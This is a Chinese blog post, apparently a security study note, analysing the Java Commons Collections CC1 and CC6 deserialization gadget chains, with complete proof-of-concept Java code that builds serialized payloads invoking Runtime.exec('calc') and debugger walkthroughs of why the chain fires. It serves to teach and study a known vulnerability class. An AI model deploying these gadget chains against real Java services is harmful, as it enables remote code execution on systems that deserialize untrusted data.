java反序列化CC6链

原创 已于 2025-08-12 11:10:02 修改 · 403 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java

于 2025-08-12 10:22:30 首次发布

1. CC6

环境配置参考:https://blog.youkuaiyun.com/google20/article/details/144319463

续上篇

序列化前把它看成是一个俄罗斯套娃的过程,然后反序列化就是把套娃层层剥开。

1. cc1

先来看一下CC1使用LazyMap的链子

AbstractMapDecorator.java的entrySet()->lazymap.get()

/*
	Gadget chain:
		ObjectInputStream.readObject()
			AnnotationInvocationHandler.readObject()
				Map(Proxy).entrySet()
					AnnotationInvocationHandler.invoke()
						LazyMap.get()
							ChainedTransformer.transform()
								ConstantTransformer.transform()
								InvokerTransformer.transform()
									Method.invoke()
										Class.getMethod()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.getRuntime()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()

	Requires:
		commons-collections
 */

在这里插入图片描述

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Annotation;
import java.lang.annotation.Target;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.*;

public class CC1 {
    public static void main(String[] args) throws Exception {

        Transformer[] transformerArray=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);

        HashMap<Object, Object> map = new HashMap();
        Map<Object, Object> lazyMap = LazyMap.decorate(map,chainedTransformer);//参数Map map, Transformer factory
        Class ac=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationConstructor= ac.getDeclaredConstructor(Class.class, Map.class);
        annotationConstructor.setAccessible(true);
        InvocationHandler h = (InvocationHandler)annotationConstructor.newInstance(Override.class, lazyMap);
        //传的注解只用过annotationType = AnnotationType.getInstance(type);的异常检测就行
        //动态生成代理类,需要传入类加载器、接口数组和InvocationHandler实例
        Map mapProxy = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(),new Class[]{Map.class},h);
        //使用LazyMap的类加载器创建代理对象
        //代理对象实现Map接口,所有方法调用由InvocationHandler h处理
        Object o=annotationConstructor.newInstance(Override.class, mapProxy);
        serialize(o);
        //unserialize("ser1.bin")

    }
    //序列化方法
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser1.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
        //会尝试调用被反序列化对象的类中的readObject(ObjectInputStream in)方法
    }
}

2. cc6

与 CC1 不同,CC6 不依赖 AnnotationInvocationHandler.java,因此不受 JDK 1.8.0_71 及以上版本的修复影响。

jdk1.8.0_65
在这里插入图片描述
jdk1.8.0_181

先通过streamVals.entrySet()遍历数据,再存入新创建的LinkedHashMap,完全跳过了TransformedMap/LazyMap的触发点memberValue.setValue()
在这里插入图片描述
在这里插入图片描述

CC6执行过程

/*
	Gadget chain:
	    java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

    by @matthias_kaiser
*/

在这里插入图片描述

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Annotation;
import java.lang.annotation.Target;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.*;

public class CC6 {
    public static void main(String[] args) throws Exception {

        Transformer[] transformerArray=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformerArray);

        HashMap<Object, Object> map = new HashMap();
        Map<Object, Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));
        //参数Map map, Transformer factory
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
        HashMap<Object,Object> map2=new HashMap<>();//HashMap对key调用hashCode()函数
        map2.put(tiedMapEntry,"bbb");//put的时候会给lazyMap添加key
        lazyMap.remove("aaa");

        Class c=LazyMap.class;
        Field factoryField=c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);

        //serialize(map2);
        unserialize("ser1.bin");

    }
    //序列化方法
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser1.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
        //会尝试调用被反序列化对象的类中的readObject(ObjectInputStream in)方法
    }
}

在这里插入图片描述

3. 正向跟踪一下

先断在这里new TiedMapEntry(lazyMap,"aaa");
在这里插入图片描述

对HashMap.java中的三个函数打条件断点

get(Object key)
hash(Object key)
put(K key, V value)

其实没什么用,调试器该忽略断点还是忽略断点。

"main".equals(Thread.currentThread().getName()) && key != null && key.toString().contains("Tied")

可以看到get函数先触发
在这里插入图片描述

然后是hash()函数
在这里插入图片描述

需要注意的是TiedMapEntry.java 74行和lazymap.java的157行等断点有时候会无效。

但是警告可知他们被调用了
在这里插入图片描述
在这里插入图片描述
就看这么多了。

4. unserialize跟踪

注释掉remove函数,跟踪一波

在这里插入图片描述
在这里插入图片描述

map其实是lazyMap

在这里插入图片描述

可以发现key存在会跳过if里的语句导致利用中断

需要传入的key不在lazymap的key里面才会调用transform方法,所以要保证key是第一次出现,使用remove删除key即可。

在这里插入图片描述

参考

https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java

Java反序列化CommonsCollections篇(二)-最好用的CC链 白日梦组长

Java反序列化利用篇 | CC6分析(通用版CC
哦 卷!
09-21 1808
构造方法的第二个参数用不到,所以随意传入进行,但是重要的是它接受一个Object对象,而这个对象的类需要实现Serializable接口,如果不是,则后续的序列化不能成功。属性设置为空的map对象(除上面创建的lazyMap都行),则最终就不会触发到恶意代码 (当然其他的也行:只要保证整个子到不了恶意代码就行)。方法在反序列化的时候会被调用,因此我们只需要创建一个HashMap对象,然后序列化即可。第2步将map属性设置为一个空的map对象(除上面创建的lazyMap都行)对象中的内容不完整呢?
Java反序列化回显解决方案
热门推荐
Summer's blog
06-12 1万+
于无常处知有情,于有情处知众生............... 学习无止境,努力就完事。
java反序列化---cc6
06-15 1175
Runtime.getRuntime().exec()
Java反序列化(三)——CC6CC3
Xzy03210321的博客
08-14 1633
问题2解决:其实从这里的代码逻辑上看,只要superClass.getName().equals(ABSTRACT_TRANSLET)成立,_transletIndex就会赋值为i(>0),这样就不会走_auxClasses的逻辑,下面
java反序列化-cc6
Bloyet
03-30 946
在HashCode类中的readObject方法 中就会调用hash方法,是不是跟put方法挺像的,所以现在有个问题,我们是想让他在反序列化的时候执行命令,而不是在put方法的时候就执行了,应该怎么办?在put之后,一切都正常运行,但是到了LazyMap类的get方法时,if判断为true了,没有执行transform,导致命令没有执行。我们在put的时候先随便传一个值,然后在用反射进行改变成我们需要的值,这样就解决了。现在我们确保了这个是可以的,我们就继续看哪里调用了。后续利用.hashCode()
java反序列化 cc6 分析
m0_64815693的博客
04-22 1277
java反序列化 cc6 分析
JAVA反序列化深入学习(九):CommonsCollections7与CC总结
Neolock的博客
03-29 1445
CC7 依旧是寻找 LazyMap 的触发点 CC6使用了 HashSet 而CC6使用了 Hashtable
Java 安全之反序列化漏洞 —— 所有 CC 详细讲解(一)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-16 1891
Java 安全之反序列化漏洞 CC 全解
[Java反序列化]—Shiro反序列化(二)
snowlyzz的博客
12-06 668
shiro RCE利用
java安全 反序列化(二)
sechelper的博客
12-07 840
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
Javaweb安全——反序列化漏洞-CC6
weixin_43610673的博客
06-01 951
本文环境为 JDK8u11现在开始学习,Java 8u71之后,即高版本Java利用,从CommonCollections6开始在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的 通过去触发get方法直接搜get,找到方法 查找其调用,跟踪到方法 要
Java安全学习笔记--反序列化漏洞利用CC6
m0_64685672的博客
01-24 1187
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 HashSet HashSet使用的是Hash表的数据结构,增删改查的时间复杂度为O(1),Set是一种集合,元素没有添加顺序,集合中不会有重复元素,结合一下就大概知道HashSet的大概属性了,具体是否重复的算法是根据元素所属对象的equals()方法来判断是否重复,默认是Object这个父类的方法,会比较引用是否相同,这个方法是可以重写的,比如String类就重写了这个方法,会比较内容是否相同 .
Java反序列化7-CommonsCollections6利用分析
weixin_43263451的博客
07-30 495
利用hashSet.readobject触发hashmap.put()从而触发tiedmap.hashcode从而调用getvalue从而调用lazymap.get进而进入ChainedTransformer.tranform。ysoserial是利用hashset.readobject触发hashmap.put(),其实在hashmap.readobject中也会触发hashmap.put(),所以这里用的hashmap而不是hashset。hashset.add其实就是给其hashmap赋了个值。...
[Java反序列化]Javacc6分析
Y4tacker的博客
06-02 1508
文章目录写在前面GadgetsJavaCC6分析利用参考文章 写在前面 感觉看完了cc1以后cc6就突然变得很简单了(来自P神的简化,这里我修改了一丢丢),那么就开始学习了 Gadgets /* Gadget chain: java.io.ObjectInputStream.readObject() java.util.HashMap.readObject() java.util.HashMap.hash() org.apache.commons.collections.k
Java安全』反序列化-CC6反序列化漏洞POP分析_ysoserial CommonsCollections6 PoC分析
Ho1aAs‘s Blog
03-13 850
文章目录前言代码复现工具类PoC代码审计 | 原理分析TiedMapEntry.hashCode()调用toString()方法POP完 前言 CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录 代码复现 工具类 反序列化: UnserializePacked.Unserialize.java package UnserializePacked; import java.io.*; public class Unserialize { public static v
阿里Java面试被问:单元测试的最佳实践
2501_94505843的博客
01-04 900
本文系统介绍了软件测试的最佳实践,主要包含以下内容:1. 测试金字塔原则,推荐70%单元测试+20%集成测试+10%端到端测试的比例;2. 测试代码质量标准,包括命名规范、AAA模式等;3. Mock与Stub的使用场景和区别;4. 测试数据管理策略;5. 断言最佳实践;6. 测试隔离与可重复性;7. 测试性能与维护建议;8. 边界条件测试方法;9. 有意义的测试覆盖率目标;10. TDD开发流程。文章提供了大量代码示例,并总结了单元测试检查清单和测试金字塔指导原则,强调应重点关注业务逻辑、复杂算法和边界条
面向微服务事件驱动与异步消息可靠处理的互联网系统高可用设计与多语言工程实践分享
2501_94180531的博客
01-05 458
事件驱动解耦服务,提高吞吐可靠投递与幂等消费保证消息一致性监控、重试与顺序控制是稳定性的关键微服务事件驱动与异步消息可靠处理,使系统在高并发和复杂业务场景下保持稳定与可控。通过在多语言系统中统一幂等语义、结合可靠投递、顺序控制和监控策略,互联网系统能够在异步流程中实现高可用和长期可维护性。这篇关于事件驱动与异步消息可靠处理的工程实践分享,希望为你在微服务高可用设计中提供可落地、长期有效的参考思路。
TDengine JAVA 语言连接器入门指南
TDengine(老段)专注时序数据库领域
01-04 1819
JAVA 语言连接器
windows下的守护进程|nssm
最新发布
slongzhang的博客
01-06 1128
NSSM(Non-Sucking Service Manager)是Windows系统中将普通程序封装为系统服务的工具。使用步骤包括:下载解压NSSM,以管理员身份运行CMD/PowerShell;通过图形界面或命令行安装服务,配置可执行文件路径、参数等;使用start/stop/restart命令管理服务;支持通过edit命令修改配置或remove删除服务;建议配置日志功能方便排查问题。核心功能是实现进程守护,确保程序异常退出后自动重启。
反序列化poc
10-11
反序列化POC相关信息包含多个方面,不同技术与场景下均有涉及。 在Java领域,有关于反序列化漏洞POC的详细解读。Java反序列化漏洞从爆出到现在已有白帽子实现了jenkins、weblogic、jboss等的代码执行利用工具,对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cllsse

富✌您吉祥

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值